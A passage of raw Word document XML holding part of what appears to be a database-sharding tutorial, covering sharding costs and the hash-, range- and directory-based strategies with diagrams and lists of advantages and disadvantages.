      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="076DF1B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26381C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Failure blast radius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4374CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>100% of data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E47BCA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>10% of data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FDFB528" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What sharding costs you:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64357CAC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Application/infrastructure must know how to route to the correct shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FCB4B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-shard queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> JOINs across shards are expensive or impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ADAF56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transactions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> ACID transactions across shards require distributed protocols (2PC, Saga).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192C74F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rebalancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> When shards become uneven, moving data is operationally challenging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F47AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1547"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operational overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> N shards = N databases to monitor, backup, upgrade, troubleshoot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD7091" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="1BF723B0">
          <v:rect id="_x0000_i5759" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469457C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Sharding Strategies — How to Divide Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F80C63" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Key-Based (Hash) Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E001A6B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502364B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9904C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>shard_number = hash(shard_key) % number_of_shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B517E29" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6061E0D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Example (4 shards):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB2179" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id = 12345 → hash(12345) % 4 = 1 → Shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FED7C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  user_id = 67890 → hash(67890) % 4 = 3 → Shard 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65866F4F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  user_id = 11111 → hash(11111) % 4 = 0 → Shard 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71690B8E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ED28F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649789A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│              Shard Key: user_id                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA482DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513D26BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ Shard 0  │ Shard 1  │ Shard 2  │ Shard 3       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203DAF5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│hash%4=0  │hash%4=1  │hash%4=2  │hash%4=3       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F3A89E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│users:    │users:    │users:    │users:          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16989768" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ 11111    │ 12345    │ 24680    │ 67890          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F53ABC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ 44444    │ 55555    │ 88888    │ 99999          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB22DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ ...      │ ...      │ ...      │ ...            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D4D60B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05243D77" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56AD0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Even distribution (good hash function → uniform spread).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3A0672" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Simple to compute (deterministic — any node can compute the shard for any key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F160FC4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1548"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>No need for a lookup table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67AF8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C70D97" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range queries are impossible:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> WHERE user_id BETWEEN 1000 AND 2000 must hit ALL shards (hash doesn't preserve order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F613172" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resharding is painful:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Changing the number of shards (modulo changes) remaps almost ALL keys. Must migrate massive amounts of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB2C938" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1549"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot keys still possible:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> If one key receives disproportionate traffic (celebrity user), its shard is overloaded regardless of hash distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE24EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Range-Based Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AE7FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E2E3F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Divide the key space into contiguous ranges, assign each range to a shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654FB199" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5D2FFF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Shard 0: user_id 1–1,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B071551" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1: user_id 1,000,001–2,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C98970" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 2: user_id 2,000,001–3,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA4C53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 3: user_id 3,000,001–4,000,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F06AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Or by time (time-series data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EF5A8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471FFA1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 0: January 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468C1F9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1: February 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E611F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 2: March 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B5C5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10232166" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC4EFB7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1550"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range queries are efficient:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> WHERE user_id BETWEEN 1500000 AND 1600000 hits exactly ONE shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D1905" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1550"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Natural ordering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Data within a shard is ordered → efficient sequential scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125B0FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1550"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Easy to split:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> When a shard grows too large, split its range in half (two shards from one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0350B1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B8964" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uneven distribution (hotspots):</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> If user_ids are sequential (auto-increment), all NEW writes go to the LAST shard (the one covering the highest range). One shard is hot while others are idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67129B2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-based hotspots:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> If sharding by month, the current month's shard handles ALL writes. Previous months' shards are idle (cold data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7924B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1551"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requires a range mapping table:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Something must know which range maps to which shard (metadata service or config).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1420A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Directory-Based (Lookup Table) Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34DB71" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D349CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>A lookup service (directory) maintains an explicit mapping: key → shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C32FD0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E1F72" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>┌─────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D92CF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│       Lookup Service         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DA278" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  user_id 12345 → Shard 2    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6EA0AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  user_id 67890 → Shard 0    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16C07A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  user_id 11111 → Shard 3    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E2C191" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  ...                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028A8D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E175A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A6658" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
